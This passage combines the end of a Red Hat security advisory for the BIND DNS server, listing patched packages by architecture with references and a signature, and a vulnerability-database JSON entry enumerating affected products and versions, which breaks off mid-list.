s390x: bind-9.9.4-18.el7_1.5.s390x.rpm bind-chroot-9.9.4-18.el7_1.5.s390x.rpm bind-debuginfo-9.9.4-18.el7_1.5.s390.rpm bind-debuginfo-9.9.4-18.el7_1.5.s390x.rpm bind-libs-9.9.4-18.el7_1.5.s390.rpm bind-libs-9.9.4-18.el7_1.5.s390x.rpm bind-libs-lite-9.9.4-18.el7_1.5.s390.rpm bind-libs-lite-9.9.4-18.el7_1.5.s390x.rpm bind-utils-9.9.4-18.el7_1.5.s390x.rpm
x86_64: bind-9.9.4-18.el7_1.5.x86_64.rpm bind-chroot-9.9.4-18.el7_1.5.x86_64.rpm bind-debuginfo-9.9.4-18.el7_1.5.i686.rpm bind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm bind-libs-9.9.4-18.el7_1.5.i686.rpm bind-libs-9.9.4-18.el7_1.5.x86_64.rpm bind-libs-lite-9.9.4-18.el7_1.5.i686.rpm bind-libs-lite-9.9.4-18.el7_1.5.x86_64.rpm bind-utils-9.9.4-18.el7_1.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: bind-9.9.4-18.ael7b_1.5.src.rpm
noarch: bind-license-9.9.4-18.ael7b_1.5.noarch.rpm
ppc64le: bind-9.9.4-18.ael7b_1.5.ppc64le.rpm bind-chroot-9.9.4-18.ael7b_1.5.ppc64le.rpm bind-debuginfo-9.9.4-18.ael7b_1.5.ppc64le.rpm bind-libs-9.9.4-18.ael7b_1.5.ppc64le.rpm bind-libs-lite-9.9.4-18.ael7b_1.5.ppc64le.rpm bind-utils-9.9.4-18.ael7b_1.5.ppc64le.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: bind-debuginfo-9.9.4-18.el7_1.5.ppc.rpm bind-debuginfo-9.9.4-18.el7_1.5.ppc64.rpm bind-devel-9.9.4-18.el7_1.5.ppc.rpm bind-devel-9.9.4-18.el7_1.5.ppc64.rpm bind-lite-devel-9.9.4-18.el7_1.5.ppc.rpm bind-lite-devel-9.9.4-18.el7_1.5.ppc64.rpm bind-sdb-9.9.4-18.el7_1.5.ppc64.rpm bind-sdb-chroot-9.9.4-18.el7_1.5.ppc64.rpm
s390x: bind-debuginfo-9.9.4-18.el7_1.5.s390.rpm bind-debuginfo-9.9.4-18.el7_1.5.s390x.rpm bind-devel-9.9.4-18.el7_1.5.s390.rpm bind-devel-9.9.4-18.el7_1.5.s390x.rpm bind-lite-devel-9.9.4-18.el7_1.5.s390.rpm bind-lite-devel-9.9.4-18.el7_1.5.s390x.rpm bind-sdb-9.9.4-18.el7_1.5.s390x.rpm bind-sdb-chroot-9.9.4-18.el7_1.5.s390x.rpm
x86_64: bind-debuginfo-9.9.4-18.el7_1.5.i686.rpm bind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm bind-devel-9.9.4-18.el7_1.5.i686.rpm bind-devel-9.9.4-18.el7_1.5.x86_64.rpm bind-lite-devel-9.9.4-18.el7_1.5.i686.rpm bind-lite-devel-9.9.4-18.el7_1.5.x86_64.rpm bind-sdb-9.9.4-18.el7_1.5.x86_64.rpm bind-sdb-chroot-9.9.4-18.el7_1.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64le: bind-debuginfo-9.9.4-18.ael7b_1.5.ppc64le.rpm bind-devel-9.9.4-18.ael7b_1.5.ppc64le.rpm bind-lite-devel-9.9.4-18.ael7b_1.5.ppc64le.rpm bind-sdb-9.9.4-18.ael7b_1.5.ppc64le.rpm bind-sdb-chroot-9.9.4-18.ael7b_1.5.ppc64le.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: bind-9.9.4-18.el7_1.5.src.rpm
noarch: bind-license-9.9.4-18.el7_1.5.noarch.rpm
x86_64: bind-9.9.4-18.el7_1.5.x86_64.rpm bind-chroot-9.9.4-18.el7_1.5.x86_64.rpm bind-debuginfo-9.9.4-18.el7_1.5.i686.rpm bind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm bind-libs-9.9.4-18.el7_1.5.i686.rpm bind-libs-9.9.4-18.el7_1.5.x86_64.rpm bind-libs-lite-9.9.4-18.el7_1.5.i686.rpm bind-libs-lite-9.9.4-18.el7_1.5.x86_64.rpm bind-utils-9.9.4-18.el7_1.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: bind-debuginfo-9.9.4-18.el7_1.5.i686.rpm bind-debuginfo-9.9.4-18.el7_1.5.x86_64.rpm bind-devel-9.9.4-18.el7_1.5.i686.rpm bind-devel-9.9.4-18.el7_1.5.x86_64.rpm bind-lite-devel-9.9.4-18.el7_1.5.i686.rpm bind-lite-devel-9.9.4-18.el7_1.5.x86_64.rpm bind-sdb-9.9.4-18.el7_1.5.x86_64.rpm bind-sdb-chroot-9.9.4-18.el7_1.5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-5722 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFV58/pXlSAg2UNWIIRAqo9AKCYvGAS0XIjah0Rvz9F9cWxd/VCxwCcDkOK 9T/pbmUk+4CypupOJP/vVmA= =hqc9 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. 6.6) - i386, ppc64, s390x, x86_64
- (CVE-2015-8000)
Note: This issue affects authoritative servers as well as recursive servers, however authoritative servers are at limited risk if they perform authentication when making recursive queries to resolve addresses for servers listed in NS RRSETs
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201509-0003", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "bind", "scope": "lte", "trust": 1.0, "vendor": "isc", "version": "9.10.2" }, { "model": "mac os x server", "scope": "eq", "trust": 1.0, "vendor": "apple", "version": "5.0.15" }, { "model": "bind", "scope": "lte", "trust": 1.0, "vendor": "isc", "version": "9.9.7" }, { "model": "bind", "scope": "eq", "trust": 0.6, "vendor": "isc", "version": "9.9.7" }, { "model": "bind", "scope": "eq", "trust": 0.6, "vendor": "isc", "version": "9.10.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "15.04" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.4" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.3" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.2" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.6" }, { "model": "bind p3", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.5.1" }, { "model": "bind p1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.5.1" }, { "model": "bind a2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.5" }, { "model": "bind a1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.5" }, { "model": "bind p3", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4.3" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4.3" }, { "model": "bind -p1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4.1" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4.1" }, { "model": "bind rc2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind rc1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind b4", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind b2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind b1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind a6", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind a5", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind a4", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind a3", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind a2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind a1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind p1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.6" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.6" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.5" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.4" }, { "model": "bind rc3", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.3" }, { "model": "bind rc2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.3" }, { "model": "bind rc1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.3" }, { "model": "bind b1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.3" }, { "model": "bind b", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.3" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.3" }, { "model": "bind -p2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.2" }, { "model": "bind -p1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.2" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.2" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.8" }, { "model": "bind rc3", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.7" }, { "model": "bind rc2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.7" }, { "model": "bind rc1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.7" }, { "model": "bind b1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.7" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.7" }, { "model": "bind -p2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.6" }, { "model": "bind -p1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.6" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.6" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.5" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.4" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.3" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.2" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.1" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.1.3" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.1.2" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.1.1" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.1" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.0.1" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.0" }, { "model": "bind 9.7.1-p2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind p1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.7.1" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.7.1" }, { "model": "bind p2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.7.0" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.7.0" }, { "model": "bind 9.6.1-p3", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.6.1-p2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.6.0-p1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.2-p2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.2-p1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.1b1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.0b2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.0b1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.0a7", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.0a6", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.0a5", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.0a4", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.0a3", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.0-p2-w2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.0-p2-w1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.5.0-p2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.4.3b2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.4.3-p5", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.4.3-p4", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.4.3-p1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.4.2-p2-w2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.4.2-p2-w1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.4.2-p2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.3.5-p2-w1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind 9.3.5-p2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.13" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.12" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v39.7" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v310.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v29.7" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v210.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v19.7" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v110.1" }, { "model": "security proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.9.0" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.8.0" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.7.0" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.6.0" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.0" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.80" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.1.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "vcx", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.8.17" }, { "model": "hp-ux b.11.31.09", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "hp-ux b.11.31.08", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "hp-ux b.11.31.06", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "9.3-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p24", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p22", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p21", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta3-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "9.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-rc2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rc2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "9.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p23", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p22", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p20", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p18", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": 